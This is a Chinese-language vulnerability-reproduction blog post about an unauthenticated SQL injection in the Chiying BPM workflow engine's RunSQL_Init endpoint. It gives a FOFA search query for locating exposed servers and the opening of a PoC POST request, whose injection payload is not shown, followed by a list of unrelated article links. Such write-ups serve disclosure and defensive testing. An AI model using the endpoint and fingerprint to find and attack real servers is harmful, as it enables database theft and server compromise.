当前位置: 首页 > news >正文

驰骋BPM RunSQL_Init SQL注入漏洞复现

0x01 产品简介

驰骋BPM系统由济南驰骋信息技术有限公司研发,具有悠久的历史和丰富的行业经验。其工作流引擎CCFlow自2003年开始研发,是国内知名的老牌工作流引擎,在BPM领域拥有广泛的研究群体与应用客户群。统提供.net与java两个版本,且两个版本的代码结构、数据库结构、设计思想、功能组成、操作手册完全相同。产品核心代码100%开源,便于用户跟踪调试、修改及扩展。

0x02 漏洞概述

驰骋BPM RunSQL_Init 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:

icon_hash="-1564380241" || body="正在登录流程&表单引擎设计器,请稍候"

0x04 漏洞复现 

PoC

POST /WF/Comm/Handler.ashx?DoType=RunSQL_Init HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----123128

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 通过数组中元素或者key将数组拆分归类成新的二维数组
  • 轩轩游桂林
  • MySql-MySqlConnector
  • docker 部署 mysql8
  • 设计模式-单一职责模式
  • WPS excel 数据最小二乘法拟合
  • 4、命令式和声明式
  • Linux shell编程:监控进程CPU使用率并使用 perf 抓取高CPU进程信息
  • 学习前端面试知识
  • cnetos部署高可用以及七层负载均衡
  • git clone 大文件 eof 错误
  • uniapp——列表选择样式
  • 消息队列项目
  • 职业本科大数据实训室
  • 如何使用 AWS CLI 创建和运行 EMR 集群
  • const let
  • js作用域和this的理解
  • MySQL的数据类型
  • spring-boot List转Page
  • 闭包--闭包作用之保存(一)
  • 从零搭建Koa2 Server
  • 给新手的新浪微博 SDK 集成教程【一】
  • 机器学习中为什么要做归一化normalization
  • 基于Android乐音识别(2)
  • 记录一下第一次使用npm
  • 如何在GitHub上创建个人博客
  • 世界编程语言排行榜2008年06月(ActionScript 挺进20强)
  • 你对linux中grep命令知道多少?
  • Redis4.x新特性 -- 萌萌的MEMORY DOCTOR
  • ​io --- 处理流的核心工具​
  • #预处理和函数的对比以及条件编译
  • (4)通过调用hadoop的java api实现本地文件上传到hadoop文件系统上
  • (Bean工厂的后处理器入门)学习Spring的第七天
  • (补充):java各种进制、原码、反码、补码和文本、图像、音频在计算机中的存储方式
  • (仿QQ聊天消息列表加载)wp7 listbox 列表项逐一加载的一种实现方式,以及加入渐显动画...
  • (分享)一个图片添加水印的小demo的页面,可自定义样式
  • (九)信息融合方式简介
  • (亲测成功)在centos7.5上安装kvm,通过VNC远程连接并创建多台ubuntu虚拟机(ubuntu server版本)...
  • (十五)Flask覆写wsgi_app函数实现自定义中间件
  • (万字长文)Spring的核心知识尽揽其中
  • (一)springboot2.7.6集成activit5.23.0之集成引擎
  • (转)用.Net的File控件上传文件的解决方案
  • .axf 转化 .bin文件 的方法
  • .NET 使用 ILRepack 合并多个程序集(替代 ILMerge),避免引入额外的依赖
  • .net 桌面开发 运行一阵子就自动关闭_聊城旋转门家用价格大约是多少,全自动旋转门,期待合作...
  • .net6使用Sejil可视化日志
  • .net反编译工具
  • .NET轻量级ORM组件Dapper葵花宝典
  • :class的用法及应用
  • @RequestParam @RequestBody @PathVariable 等参数绑定注解详解
  • [ C++ ] STL---stack与queue
  • []AT 指令 收发短信和GPRS上网 SIM508/548
  • [AIGC] 使用Curl进行网络请求的常见用法
  • [Algorithm][动态规划][01背包问题][目标和][最后一块石头的重量Ⅱ]详细讲解
  • [Cloud Networking] Layer3 (Continue)